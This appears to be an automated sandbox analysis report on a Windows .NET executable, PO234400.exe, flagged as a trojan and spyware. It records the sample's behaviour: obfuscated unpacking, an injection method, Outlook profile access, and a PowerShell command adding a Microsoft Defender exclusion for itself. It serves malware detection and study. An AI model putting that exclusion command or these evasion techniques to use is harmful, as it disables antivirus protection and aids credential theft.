                        Source: 0.2.PO234400.exe.6000000.8.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: 0.2.PO234400.exe.2f7ff00.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/6@1/1
                        Source: C:\Users\user\Desktop\PO234400.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO234400.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a05r2hnr.pls.ps1Jump to behavior
                        Source: PO234400.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: PO234400.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\PO234400.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\PO234400.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: PO234400.exeReversingLabs: Detection: 60%
                        Source: unknownProcess created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exe
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO234400.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess created: C:\Users\user\Desktop\PO234400.exe C:\Users\user\Desktop\PO234400.exeJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\PO234400.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: PO234400.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: PO234400.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: PO234400.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: YgrO.pdb source: PO234400.exe
                        Source: Binary string: YgrO.pdbSHA256_ source: PO234400.exe

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: PO234400.exe, Form9.cs.Net Code: InitializeComponent contains xor as well as GetObject
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.cs.Net Code: lgJAWSGwI5 System.Reflection.Assembly.Load(byte[])
                        Source: PO234400.exeStatic PE information: 0xF37F2E8A [Mon Jun 15 09:21:14 2099 UTC]
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 0_2_012C01A9 push esp; ret 0_2_012C01B3
                        Source: C:\Users\user\Desktop\PO234400.exeCode function: 6_2_069104B0 push es; ret 6_2_069104C0
                        Source: PO234400.exeStatic PE information: section name: .text entropy: 7.8603183590444825
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, aHaM0V3Y6ypixdFZQS.csHigh entropy of concatenated method names: 'gCsF7k4lAU', 'aiNFVBSXXg', 'CcEF0qZveA', 'mCwFC4fbmN', 'CG0FI05jaS', 'dTGFJyM4TB', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, IZKjU01Eq84VxH2YtA.csHigh entropy of concatenated method names: 'AntjrPoMlO', 'z7Ij8ZfGt2', 'Wkqj4H6rGH', 'VYbjfrS5RR', 'A1AjcENMBU', 'kBrjbIXyyg', 'JCxj3OW3h6', 'kDojadXbPc', 'zBljQaNNhl', 'XEdjo3nOP5'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, dG0cRqRa8r2T3nra0D.csHigh entropy of concatenated method names: 'UmS4IFLhGb', 'FvM4E0fPKU', 'shc4PvBehN', 'RCw4ZfhXgR', 'IUc4dSekII', 'ho54yTApZN', 'BQC4xKtIOA', 'mVr46et30n', 'IXS4tm90qe', 's264mVbeKn'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, gP5fS0ThqVLnq2uc8A.csHigh entropy of concatenated method names: 'dwx3ibeovC', 'u4w3R26YEJ', 'UKU3WGWpsB', 'Wnp3sZYGqJ', 'A7S3HhF5fe', 'h3p31ikBx1', 'yuY3U7w898', 'JYS3we4VFa', 'wPy35yvTHZ', 'gGp3O5X8U2'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, CpolQWAjBSp0XoohU7.csHigh entropy of concatenated method names: 'DqXX3kmqEq', 'rebXaPijdT', 'yHmXokomhB', 'kOZXnrWYKL', 'yTVXKAi18S', 'FWyXhwm2Wr', 'I6mkMqjjAV6gWbq1wI', 'rPK9EN66g4ZuQ7hQXj', 'pg0XXQL0pE', 'fYEXjnWGGm'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, hEhQkB2ZdTclJYwpZV.csHigh entropy of concatenated method names: 'Avse6hVs4q', 'A5lemXxhfn', 'qBeF2xahec', 'cwuFXSMHYw', 'ClSeT7oaqN', 'Rd7eqjxPON', 'lWeeBi0u3x', 'pVgeI8aHby', 'LcXeEqel3O', 'ExoePWYygO'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, TOioCChx7ZwAfc8sJP.csHigh entropy of concatenated method names: 'kgR383S6mA', 'EBT3faPsrK', 'pgS3bveFW8', 'nWSbmptxEB', 'MaYbzHqc08', 'uNC32YV95g', 'UPi3XwIPKK', 'P523MuI8tZ', 'QwY3jp9XwV', 'dXH3AjrpSE'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, tK0XW14eOIiwDBeNYRA.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XyUuIScM5J', 'yjDuEAZ9iI', 'y9uuPfxgFi', 'JiVuZVo4yJ', 'jhFudvv8kC', 'KDAuystY6o', 'aQouxrcs0a'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, V6gdXUqy5MOlrIu7PW.csHigh entropy of concatenated method names: 'ztkKDfMmen', 'MXYKqce8TY', 'sMjKIXZ5V3', 'iIRKEDJGmc', 'GDnKVby7WW', 'N6JK0thbNu', 'pTbKCHQHAl', 'pD0KJW51Ot', 'AOeKvlqaUt', 'zoSKpeiOa4'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, ITTa6Q4XFHgRdBeiMdF.csHigh entropy of concatenated method names: 'RgiNiDAqOr', 'fcsNRDjiV8', 'I6kNWdosCd', 'EDkNs2nnxh', 'iUsNHFZ8gq', 'VD3N1U5SlM', 'NJTNUO4C9d', 'nAINwok1Eo', 'qSUN5QPIwQ', 'KpENOvQ4AQ'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, aLVhkw7UQ3f0kK8ZEu.csHigh entropy of concatenated method names: 'oGvbr0M9WA', 'Ahsb4pQKuT', 'cGkbcRDs6M', 'I8Xb39jHWb', 'nQ1ba6OBEo', 'Xm7cd3HG0T', 'Whtcy2GuRJ', 'wYccxeT1Hm', 'RmRc6jtjrH', 'D8ZctVJtJS'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, HMbQwtzm8ENdW7OadK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ADJNGPnBgV', 'KekNKScF4h', 'zG8NhYpC5F', 'wMfNeCZyZk', 'COPNFmCfNb', 'sBmNNAalZ0', 'fQRNuFiKu7'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, glyVrDHeWXfPMbiDx4.csHigh entropy of concatenated method names: 'lArF8mOR0T', 'UXtF4oX2BM', 'CQiFfASJZK', 'G3RFcvRC8y', 'rvmFbm6FeQ', 'dCmF3JdR9o', 'dS5FaE6wTg', 'AwrFQT003h', 'hMCFoCyyUL', 'd2sFn3KhuS'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, q3MIdHPT60Wa9gvcfC.csHigh entropy of concatenated method names: 'Bq8Gw5CTwh', 'jGuG5sRG2l', 'WJkG7W4KWG', 'HgIGVZ0fBB', 'ILSGC5QjjA', 'lbjGJ5rFma', 'vtwGpZRT0n', 'PoFGYvaS8o', 'xu3GD8Zxw4', 'g1xGTnQ4Ql'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, htDdwZkse3kWN2CecU.csHigh entropy of concatenated method names: 'zycfsm5sb2', 'MGGf1AEIAC', 'IgtfwGtfDs', 'aPGf5tQ11v', 'BEffKPN1RJ', 'c3Tfh62cQs', 'LIKfe3DP5i', 'H8ufF2UtOn', 'u9rfNlVmOl', 'XUmfuieYuI'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, barJkfKldSjloEQ6gN.csHigh entropy of concatenated method names: 'kCHWkK2CV', 'lAws2nw5n', 'Pkx1teJZf', 'vdiUxrnuu', 'hHM5DU0t8', 's9GOxm7vJ', 'jbrmhhZIqN5FRlHJdC', 'DUTVAHmraj5WPQst0a', 'mc0FDRufd', 'VTouX5TxQ'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, bgO281GQpjSekMRPQK.csHigh entropy of concatenated method names: 'ToString', 'evyhTpVjNK', 'kaQhV2oXK3', 'nsyh0WEasY', 'lGxhCXkZ41', 'miJhJgTDZJ', 'cBmhviR2aU', 'uHjhpRTOWU', 'KcphYlylqh', 'UtOhl6XeXT'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, Wd4UcV5MG836f5amMB.csHigh entropy of concatenated method names: 'PW3eoL7iBU', 'COyenPvYck', 'ToString', 'JUTe8ipaWI', 'EQie4IC7D0', 'WkqefMhYjZ', 'qDxecy93Um', 'VCPebyNHv4', 'cbQe3WF0Yi', 'YYTeaAL0jD'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, YmC0jQOf8YTrbWO2VG.csHigh entropy of concatenated method names: 'BUyNX5So1X', 'z2MNjQjttV', 'cMENA8cpR9', 'w7MN8pJOR3', 'FR6N4FcQuQ', 'JKNNcglXpA', 'hnBNbQf6VD', 'qB8FxG7ci3', 'x0yF6Pd5cD', 'tLFFta15pj'
                        Source: 0.2.PO234400.exe.75c0000.9.raw.unpack, vQcKgrYfOr76aSFkqA.csHigh entropy of concatenated method names: 'Dispose', 'ysIXtxmDfR', 'rgMMV4qDyj', 'qOrkkAOvBW', 'WJDXm1ItqH', 'FLPXzDCKkP', 'ProcessDialogKey', 'cs2M25wsnB', 'KxIMX2Kknl', 'FPlMMsVyDH'
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\PO234400.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
